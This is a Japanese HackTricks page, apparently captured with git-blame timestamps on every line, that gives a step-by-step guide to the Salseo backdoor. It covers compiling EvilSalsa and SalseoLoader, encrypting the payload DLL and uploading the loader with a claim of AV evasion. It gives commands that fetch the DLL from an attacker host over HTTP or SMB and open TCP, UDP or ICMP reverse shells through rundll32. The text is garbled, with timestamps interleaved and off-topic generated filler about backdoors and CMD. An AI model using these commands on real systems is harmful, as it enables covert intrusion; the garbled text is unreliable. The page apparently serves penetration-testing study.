2022-08-04 20:47:35 +00:00
# Salseo
2022-04-28 16:01:33 +00:00
< details >
2023-04-25 18:35:28 +00:00
< summary > < a href = "https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology" > < strong > ☁️ HackTricks Cloud ☁️< / strong > < / a > -< a href = "https://twitter.com/hacktricks_live" > < strong > 🐦 Twitter 🐦< / strong > < / a > - < a href = "https://www.twitch.tv/hacktricks_live/schedule" > < strong > 🎙️ Twitch 🎙️< / strong > < / a > - < a href = "https://www.youtube.com/@hacktricks_LIVE" > < strong > 🎥 Youtube 🎥< / strong > < / a > < / summary >
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
* **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
2023-08-16 05:18:52 +00:00
* [**公式のPEASS& HackTricks swag** ](https://peass.creator-spring.com )を手に入れましょう。
2023-07-07 23:42:27 +00:00
* [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discordグループ** ](https://discord.gg/hRep4RUj7f )または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **ハッキングのトリックを共有するには、PRを** [**hacktricks repo** ](https://github.com/carlospolop/hacktricks ) **と** [**hacktricks-cloud repo** ](https://github.com/carlospolop/hacktricks-cloud ) **に提出してください。**
2022-04-28 16:01:33 +00:00
< / details >
2023-07-07 23:42:27 +00:00
## バイナリのコンパイル
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
githubからソースコードをダウンロードし、**EvilSalsa**と**SalseoLoader**をコンパイルします。コードをコンパイルするには**Visual Studio**が必要です。
2020-07-15 15:43:14 +00:00
2023-08-16 05:18:52 +00:00
これらのプロジェクトを、使用するWindowsボックスのアーキテクチャに合わせてコンパイルしてください( Windowsがx64をサポートしている場合は、そのアーキテクチャにコンパイルします) 。
2020-07-15 15:43:14 +00:00
2023-08-15 18:34:02 +00:00
Visual Studio内で、**左側の"Build"タブ**の**"Platform Target"**でアーキテクチャを**選択**できます。
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
(\*\*このオプションが見つからない場合は、**"Project Tab"**を押し、次に**"\<Project Name> Properties"**を押します)
2020-07-15 15:43:14 +00:00
2022-08-10 14:32:58 +00:00
![](< .. / . gitbook / assets / image ( 132 ) . png > )
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
次に、両方のプロジェクトをビルドします( Build -> Build Solution) ( ログ内に実行可能ファイルのパスが表示されます) :
2020-07-15 15:43:14 +00:00
2022-09-27 00:14:52 +00:00
![](< .. / . gitbook / assets / image ( 1 ) ( 2 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
## バックドアの準備
2020-07-15 15:43:14 +00:00
2023-08-16 05:18:52 +00:00
まず、**EvilSalsa.dll**をエンコードする必要があります。これには、pythonスクリプト**encrypterassembly.py**を使用するか、プロジェクト**EncrypterAssembly**をコンパイルすることができます:
2020-07-15 15:43:14 +00:00
2022-08-04 20:47:35 +00:00
### **Python**
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
python EncrypterAssembly/encrypterassembly.py < FILE > < PASSWORD > < OUTPUT_FILE >
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
```
2022-08-04 20:47:35 +00:00
### Windows
2020-07-15 15:43:14 +00:00
2023-08-16 05:18:52 +00:00
Windows( ウィンドウズ) は、マイクロソフトが開発したオペレーティングシステムです。Windowsには、バックドアを作成するためのさまざまな方法があります。
2023-07-07 23:42:27 +00:00
2023-08-16 05:18:52 +00:00
#### リモートデスクトップ
2023-07-07 23:42:27 +00:00
2023-08-16 05:18:52 +00:00
リモートデスクトップは、Windowsの標準機能であり、リモートでコンピュータにアクセスするための便利な方法です。しかし、この機能は悪意のあるユーザーにとっても便利なツールとなり得ます。攻撃者は、リモートデスクトップを使用してバックドアを作成し、ターゲットマシンにアクセスすることができます。
2023-07-07 23:42:27 +00:00
2023-08-16 05:18:52 +00:00
#### サービス
2023-07-07 23:42:27 +00:00
2023-08-16 05:18:52 +00:00
Windowsでは、サービスと呼ばれるバックグラウンドプロセスを作成することができます。これらのサービスは、システムの起動時に自動的に実行され、バックドアとして機能することができます。攻撃者は、悪意のあるサービスを作成し、ターゲットマシンにバックドアを設置することができます。
2023-07-07 23:42:27 +00:00
2023-08-16 05:18:52 +00:00
#### レジストリ
2023-07-07 23:42:27 +00:00
2023-08-16 05:18:52 +00:00
Windowsのレジストリは、システムの設定情報を格納するデータベースです。攻撃者は、レジストリを使用してバックドアを作成し、システムの起動時に自動的に実行されるようにすることができます。これにより、攻撃者はターゲットマシンにアクセスし、制御することができます。
2023-07-07 23:42:27 +00:00
2023-08-16 05:18:52 +00:00
#### シェル拡張
Windowsでは、シェル拡張を使用してバックドアを作成することもできます。シェル拡張は、エクスプローラウィンドウの右クリックメニューに追加されるカスタムコマンドです。攻撃者は、シェル拡張を使用してバックドアを作成し、ターゲットマシンにアクセスすることができます。
これらは、Windowsでバックドアを作成するための一般的な方法のいくつかです。攻撃者はこれらの方法を使用して、ターゲットマシンに不正アクセスすることができます。セキュリティを強化するためには、これらの方法を理解し、適切な対策を講じる必要があります。
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
EncrypterAssembly.exe < FILE > < PASSWORD > < OUTPUT_FILE >
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
```
2023-08-15 18:34:02 +00:00
よし、これでSalseoのすべてを実行するために必要なものが揃いました: **エンコードされたEvilDalsa.dll**と**SalseoLoaderのバイナリ**です。
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
**SalseoLoader.exeバイナリをマシンにアップロードしてください。どのAVにも検出されないはずです...**
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
## **バックドアの実行**
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
### **TCPリバースシェルの取得( HTTPを介してエンコードされたdllをダウンロード) **
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
リバースシェルリスナーとHTTPサーバーを起動して、エンコードされたevilsalsaを提供することを忘れないでください。
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
SalseoLoader.exe password http://< Attacker-IP > /evilsalsa.dll.txt reversetcp < Attacker-IP > < Port >
```
2023-08-15 18:34:02 +00:00
### **UDPリバースシェルの取得( SMBを介してエンコードされたdllをダウンロードする) **
2020-07-15 15:43:14 +00:00
2023-08-15 18:34:02 +00:00
リバースシェルのリスナーとしてncを起動し、エンコードされたevilsalsaを提供するためのSMBサーバー( impacket-smbserver) を起動することを忘れないようにしてください。
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
SalseoLoader.exe password \\< Attacker-IP > /folder/evilsalsa.dll.txt reverseudp < Attacker-IP > < Port >
```
2023-07-07 23:42:27 +00:00
### **ICMPリバースシェルの取得( 既に被害者内にエンコードされたdllが存在する場合) **
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
**今回は、クライアント側でリバースシェルを受け取るための特別なツールが必要です。ダウンロードしてください:** [**https://github.com/inquisb/icmpsh** ](https://github.com/inquisb/icmpsh )
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
#### **ICMP応答の無効化: **
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
```
2023-08-15 18:34:02 +00:00
#### クライアントを実行する:
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
```bash
./client
```
2020-07-15 15:43:14 +00:00
2023-08-15 18:34:02 +00:00
The client will connect to the server and wait for commands.
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
python icmpsh_m.py "< Attacker-IP > " "< Victm-IP > "
```
2023-07-07 23:42:27 +00:00
#### ターゲット内部で、salseoの実行を行います:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp < Attacker-IP >
```
2023-07-07 23:42:27 +00:00
## DLLのエクスポートメイン関数としてSalseoLoaderをコンパイルする
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
Visual Studioを使用してSalseoLoaderプロジェクトを開きます。
2020-07-15 15:43:14 +00:00
2023-08-16 05:18:52 +00:00
### メイン関数の前に\[DllExport]を追加します
2020-07-15 15:43:14 +00:00
2023-08-16 05:18:52 +00:00
![](< .. / . gitbook / assets / image ( 2 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-08-16 05:18:52 +00:00
### このプロジェクトにDllExportをインストールします
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
#### **ツール** --> **NuGetパッケージマネージャー** --> **ソリューションのNuGetパッケージを管理...**
2020-07-15 15:43:14 +00:00
2023-08-16 05:18:52 +00:00
![](< .. / . gitbook / assets / image ( 3 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-08-15 18:34:02 +00:00
#### **DllExportパッケージを検索( ブラウズタブを使用) し、インストールボタンを押します( ポップアップを受け入れます) **
2020-07-15 15:43:14 +00:00
2023-06-14 10:51:55 +00:00
![](< .. / . gitbook / assets / image ( 4 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
プロジェクトフォルダには、**DllExport.bat**と**DllExport\_Configure.bat**のファイルが表示されます。
2020-07-15 15:43:14 +00:00
2023-08-16 05:18:52 +00:00
### DllExportをアンインストールします
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
**アンインストール**を押します(はい、奇妙ですが、信じてください、必要です)
2020-07-15 15:43:14 +00:00
2023-06-14 10:51:55 +00:00
![](< .. / . gitbook / assets / image ( 5 ) ( 1 ) ( 1 ) ( 2 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-08-16 05:18:52 +00:00
### Visual Studioを終了し、DllExport\_configureを実行します
2020-07-15 15:43:14 +00:00
2023-08-16 05:18:52 +00:00
Visual Studioを**終了**します
2020-07-15 15:43:14 +00:00
2023-08-16 05:18:52 +00:00
次に、**SalseoLoaderフォルダ**に移動し、**DllExport\_Configure.bat**を実行します
2020-07-15 15:43:14 +00:00
2023-08-16 05:18:52 +00:00
**x64**を選択します( x64ボックス内で使用する場合、私の場合はそうでした) 、**System.Runtime.InteropServices**( **DllExportの名前空間内**)を選択し、**Apply**を押します
2020-07-15 15:43:14 +00:00
2023-02-27 09:14:27 +00:00
![](< .. / . gitbook / assets / image ( 7 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-08-16 05:18:52 +00:00
### Visual Studioでプロジェクトを再度開きます
2020-07-15 15:43:14 +00:00
2023-08-16 05:18:52 +00:00
**\[DllExport]**はもはやエラーとしてマークされません
2020-07-15 15:43:14 +00:00
2023-06-13 10:12:02 +00:00
![](< .. / . gitbook / assets / image ( 8 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-08-16 05:18:52 +00:00
### ソリューションをビルドします
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
**出力の種類 = クラスライブラリ**を選択します(プロジェクト --> SalseoLoaderのプロパティ --> アプリケーション --> 出力の種類 = クラスライブラリ)
2020-07-15 15:43:14 +00:00
2022-10-22 15:26:54 +00:00
![](< .. / . gitbook / assets / image ( 10 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-08-16 05:18:52 +00:00
**x64プラットフォーム**を選択します(プロジェクト --> SalseoLoaderのプロパティ --> ビルド --> プラットフォームターゲット = x64)
2020-07-15 15:43:14 +00:00
2022-09-02 15:27:38 +00:00
![](< .. / . gitbook / assets / image ( 9 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-08-16 05:18:52 +00:00
ソリューションをビルドするには:ビルド --> ソリューションのビルド( 出力コンソールに新しいDLLのパスが表示されます)
2020-07-15 15:43:14 +00:00
2023-08-16 05:18:52 +00:00
### 生成されたDLLをテストします
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
テストしたい場所にDLLをコピーして貼り付けます。
2020-07-15 15:43:14 +00:00
2023-08-15 18:34:02 +00:00
実行します:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
rundll32.exe SalseoLoader.dll,main
```
2023-08-15 18:34:02 +00:00
エラーが表示されない場合、おそらく機能するDLLを持っています!
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
## DLLを使用してシェルを取得する
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
**HTTPサーバー**を使用して、**ncリスナー**を設定することを忘れないでください。
2020-07-15 15:43:14 +00:00
2022-08-04 20:47:35 +00:00
### Powershell
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
```
2023-08-15 18:34:02 +00:00
### CMD
2023-08-16 05:18:52 +00:00
CMD (Command Prompt) is a command-line interpreter in Windows operating systems. It provides a text-based interface for executing commands and managing the system. CMD can be used to perform various tasks, such as navigating through directories, running programs, and managing files and processes.
CMD is a powerful tool for hackers as it allows them to execute commands and scripts on a target system. By exploiting vulnerabilities or using social engineering techniques, hackers can gain access to a system and use CMD to perform malicious activities.
Some common CMD commands used by hackers include:
- **netstat**: This command displays active network connections and listening ports on a system. Hackers can use this command to gather information about a target's network and identify potential entry points.
- **ipconfig**: This command displays the IP configuration of a system, including the IP address, subnet mask, and default gateway. Hackers can use this command to gather information about a target's network and identify potential vulnerabilities.
- **tasklist**: This command displays a list of running processes on a system. Hackers can use this command to identify processes that may be vulnerable to exploitation or to gather information about running applications.
- **regedit**: This command opens the Windows Registry Editor, which allows hackers to modify registry keys and values. By modifying registry settings, hackers can gain persistence on a compromised system or disable security features.
- **shutdown**: This command allows hackers to shut down or restart a target system. By executing this command, hackers can disrupt the normal operation of a system or cause denial of service.
It is important to note that the use of CMD for malicious purposes is illegal and unethical. This information is provided for educational purposes only, to raise awareness about potential security risks and to promote responsible and ethical use of technology.
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
```
2022-04-28 16:01:33 +00:00
< details >
2023-04-25 18:35:28 +00:00
< summary > < a href = "https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology" > < strong > ☁️ HackTricks Cloud ☁️< / strong > < / a > -< a href = "https://twitter.com/hacktricks_live" > < strong > 🐦 Twitter 🐦< / strong > < / a > - < a href = "https://www.twitch.tv/hacktricks_live/schedule" > < strong > 🎙️ Twitch 🎙️< / strong > < / a > - < a href = "https://www.youtube.com/@hacktricks_LIVE" > < strong > 🎥 Youtube 🎥< / strong > < / a > < / summary >
2022-04-28 16:01:33 +00:00
2023-08-15 18:34:02 +00:00
* **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop)をチェックしてください!
2023-07-07 23:42:27 +00:00
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASS& HackTricksのグッズ** ](https://peass.creator-spring.com )を手に入れましょう。
* [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discordグループ** ](https://discord.gg/hRep4RUj7f )または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
2023-08-15 18:34:02 +00:00
* **ハッキングのトリックを共有するには、PRを** [**hacktricks repo** ](https://github.com/carlospolop/hacktricks ) **と** [**hacktricks-cloud repo** ](https://github.com/carlospolop/hacktricks-cloud ) **に提出してください。**
2022-04-28 16:01:33 +00:00
< / details >